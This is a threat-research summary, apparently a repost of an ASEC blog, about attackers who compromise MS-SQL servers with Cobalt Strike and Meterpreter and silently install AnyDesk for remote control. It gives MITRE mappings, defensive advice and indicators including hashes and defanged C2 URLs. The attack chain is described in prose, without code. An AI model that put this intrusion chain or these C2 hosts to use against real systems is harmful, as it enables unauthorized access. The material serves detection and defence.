Threat Research

Case of Attack Exploiting AnyDesk Remote Tool (Cobalt Strike and Meterpreter) – ASEC BLOG

Securonix

MS-SQL servers are commonly targeted by attackers who gain control and install malware, including coin miners and ransomware. The article details a case where attackers deploy Cobalt Strike and Meterpreter on vulnerable MS-SQL servers to install AnyDesk for remote control, with connections to groups like Kimsuky and Conti.
#CobaltStrike #Meterpreter #AnyDesk #Kimsuky #Conti

Keypoints

  • Attackers target vulnerable MS-SQL servers and install malware after gaining control.
  • Backdoors are often remote-control tools (Remcos RAT, Gh0st RAT), but infiltration tools like Cobalt Strike and Meterpreter are also used.
  • The attack chain installs Cobalt Strike and Meterpreter on the MS-SQL server to gain deeper access and persistence.
  • AnyDesk is then installed to enable remote control of the infected system, sometimes via silent installs with password settings.
  • Meterpreter escalates privileges (Elevator DLL) and uses rundll32.exe to run further payloads, including PowerShell scripts to install AnyDesk.
  • Defensive advice includes strong password hygiene, regular patching, and restricting external access to database servers via firewalls.
  • Detected indicators include specific MD5 hashes, PowerShell scripts, and C2/C&C URLs linked to the operation.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Attackers scan vulnerable MS-SQL servers that are poorly managed and install malware upon gaining control. ‘MS-SQL servers are mainly the attack targets for Windows systems. Attackers scan vulnerable MS-SQL servers that are poorly managed and install malware upon gaining control.’
  • [T1021] Remote Services – AnyDesk remote desktop features used to control the infected system. ‘AnyDesk is a remote control application that is similar to that of TeamViewer, providing various features such as remote desktop and sending files.’
  • [T1059.001] PowerShell – Meterpreter uses PowerShell to install AnyDesk. ‘The powershell script “wc.ps1” installed by Meterpreter installs AnyDesk in silent mode from the application’s official webpage and sets AnyDesk’s password as “wocaoybb”.’
  • [T1218.011] Signed Binary Proxy Execution: Rundll32 – Meterpreter operates in the rundll32.exe process to execute further actions. ‘After privilege escalation, Meterpreter operates in the rundll32.exe process and ultimately downloads and runs the powershell script that installs AnyDesk.’
  • [T1068] Privilege Escalation – Elevator DLL used to escalate privileges after Meterpreter is initially executed. ‘Elevator DLL is a DLL used to escalate privilege with system permission after Meterpreter is initially executed.’
  • [T1105] Ingress Tool Transfer – Meterpreter downloads and runs the powershell script to install AnyDesk. ‘ultimately downloads and runs the powershell script that installs AnyDesk.’

Indicators of Compromise

  • [MD5] Elevator DLL and wc.ps1 – 5d3ae879e4bd09f824f48b49f4782e75, 0863ab6d606dea63b76eaa846ca9effd
  • [URL] C2 / PowerShell delivery – http://3.101.101[.]56/wc.ps1, http://212.193.30[.]228:8080/a11
  • [IP] Meterpreter C2 – 194.31.98[.]133:12443

Read more: https://asec.ahnlab.com/en/36159/